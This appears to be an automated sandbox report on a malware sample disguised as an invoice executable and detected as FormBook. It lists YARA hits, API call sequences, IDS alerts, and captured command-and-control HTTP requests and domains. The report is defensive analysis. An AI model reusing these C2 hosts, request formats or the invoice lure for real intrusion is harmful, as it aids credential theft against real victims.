Windows Analysis Report
Invoice Packing list For Sea Shipment.exe

AI detected suspicious sample

Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Invoice Packing list For Sea Shipment.exe

Joe Sandbox ML: detected

Source: Invoice Packing list For Sea Shipment.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: msiexec.pdb source: svchost.exe, 00000002.00000002.1493513112.0000000005490000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1491818031.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491882471.000000000323C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.3868459041.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000002.1493513112.0000000005490000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1491818031.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491882471.000000000323C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3868459041.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1435137073.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1433632710.0000000004440000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1436232911.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1438282355.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1494333666.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1492648847.000000000481B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1435137073.00000000045E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1433632710.0000000004440000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1492808765.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1492808765.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1436232911.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1438282355.0000000003600000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.3870110705.0000000004D1E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870110705.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1494333666.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1492648847.000000000481B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3882809857.000000000FEDF000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870962113.00000000050CF000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3869139231.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3882809857.000000000FEDF000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3870962113.00000000050CF000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.3869139231.0000000002E66000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49709 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49709 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49709 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49711 -> 89.184.73.149:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49711 -> 89.184.73.149:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49711 -> 89.184.73.149:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49710 -> 154.197.26.133:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49710 -> 154.197.26.133:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49710 -> 154.197.26.133:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.9net88.net/ge07/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.eader-aaexvn.xyz
Source:	DNS query: www.isit-txax.xyz
Source:	DNS query: www.ithin-ksvodn.xyz
Source:	DNS query: www.hqm-during.xyz

Source: global traffic	HTTP traffic detected: GET /ge07/?FXT8AF=2dkTOn9Hj2ox&T8itM8U=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tPZEr4Tl6UO HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ge07/?T8itM8U=nFq8hlOZkZdpcl2LrU6NtCobGyYRF4oO9voe8xIKTNUMBh2BLqz18CwKfuceLAjhfH+x&FXT8AF=2dkTOn9Hj2ox HTTP/1.1Host: www.xhyx.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 199.59.243.227 199.59.243.227

Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe

Code function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,

0_2_0044289D

Source: global traffic	HTTP traffic detected: GET /ge07/?FXT8AF=2dkTOn9Hj2ox&T8itM8U=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tPZEr4Tl6UO HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ge07/?T8itM8U=nFq8hlOZkZdpcl2LrU6NtCobGyYRF4oO9voe8xIKTNUMBh2BLqz18CwKfuceLAjhfH+x&FXT8AF=2dkTOn9Hj2ox HTTP/1.1Host: www.xhyx.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.eader-aaexvn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ebaoge318.top
Source: global traffic	DNS traffic detected: DNS query: www.9net88.net
Source: global traffic	DNS traffic detected: DNS query: www.xhyx.top
Source: global traffic	DNS traffic detected: DNS query: www.rbuds.shop
Source: global traffic	DNS traffic detected: DNS query: www.acifictechnologycctv.net
Source: global traffic	DNS traffic detected: DNS query: www.isit-txax.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ithin-ksvodn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.rasko.net
Source: global traffic	DNS traffic detected: DNS query: www.lsader.app
Source: global traffic	DNS traffic detected: DNS query: www.epehr.pics
Source: global traffic	DNS traffic detected: DNS query: www.hqm-during.xyz

Source: explorer.exe, 00000003.00000000.1444179023.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077305092.0000000009264000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009220000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.1444179023.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077305092.0000000009264000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009220000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.1444179023.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077305092.0000000009264000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009220000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000000.1441834914.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3872042054.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000003.00000000.1444179023.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077305092.0000000009264000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009220000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1444179023.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3877356610.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3078894481.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2289271188.0000000009264000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.1444179023.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3876974501.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284743731.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.3875762988.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3870208469.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3875793689.0000000007720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.6282.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.6282.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.6282.xyz/ge07/www.azl.pro
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.6282.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net/ge07/www.xhyx.top
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.netReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acifictechnologycctv.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acifictechnologycctv.net/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acifictechnologycctv.net/ge07/www.isit-txax.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acifictechnologycctv.netReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.azl.pro
Source: explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.azl.pro/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.azl.proReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eader-aaexvn.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eader-aaexvn.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eader-aaexvn.xyz/ge07/www.ebaoge318.top
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eader-aaexvn.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ebaoge318.top
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ebaoge318.top/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ebaoge318.top/ge07/www.9net88.net
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ebaoge318.topReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eloshost.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eloshost.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eloshost.xyz/ge07/www.giyztm.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.eloshost.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.epehr.pics
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.epehr.pics/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.epehr.pics/ge07/www.hqm-during.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.epehr.picsReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz/ge07/www.6282.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hqm-during.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hqm-during.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hqm-during.xyz/ge07/www.eloshost.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hqm-during.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.isit-txax.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.isit-txax.xyz/ge07/
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.isit-txax.xyz/ge07/www.ithin-ksvodn.xyz
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.isit-txax.xyzReferer:
Source: explorer.exe, 00000003.00000002.3882134526.000000000C151000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2287539283.000000000C146000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz
